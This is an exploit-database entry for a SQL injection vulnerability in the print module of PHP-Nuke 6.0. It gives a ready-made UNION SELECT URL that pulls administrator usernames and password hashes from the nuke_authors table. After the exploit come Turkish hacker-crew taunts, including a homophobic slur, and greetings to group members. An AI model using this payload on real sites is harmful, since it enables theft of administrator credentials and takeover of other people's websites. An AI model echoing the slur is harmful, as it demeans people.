ad

PHP-Nuke Module print 6.0 (print&sid) SQL Injection Vulnerability



EDB-ID: 13916 CVE: N/A OSVDB-ID: N/A
Author: Gamoscu Published: 2010-06-17 Verified: Not Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
PHP-Nuke Module print 6.0 (print&sid) SQL Injection Vulnerability
      
###########################  
Author    : Gamoscu
Homepage  : www.1923turk.com
Blog      : http://gamoscu.wordpress.com
Script    : PHP-Nuke Module print 6.0 
Download  : http://phpnuke.org/modules.php?name=Downloads&d_op=viewdownload&cid=6 
###########################    
        
[ Vulnerable File ]  
    
modules.php?name=News&file=print&sid= [ SQL ]  
         
    
[ XpL ]  
      
http://www.xxxxx/modules.php?name=News&file=print&sid=-1+union+select+1,2,pwd,aid,5,6,7+from+nuke_authors--


Deli Kurtlar derki:
    
~~~~Yerinde sayanlar,Yürüyenlerden cok gürültü yaparlar!~~~~


Lamer ibneleri!!  sizi suleyman dayýya havale ediyorum :) onlar Kendilerini iyi bilirler

Maskeli5ler cok yakinda  Deli KurtlarLA Donuyor
      
Baybora :http://baybora.wordpress.com

X-TRO   :http://maskeli5ler.wordpress.com
  
       
##############################################################    
# Greetz: Manas58 - - Delibey - Tiamo - Psiko - Turco - infazci      
##############################################################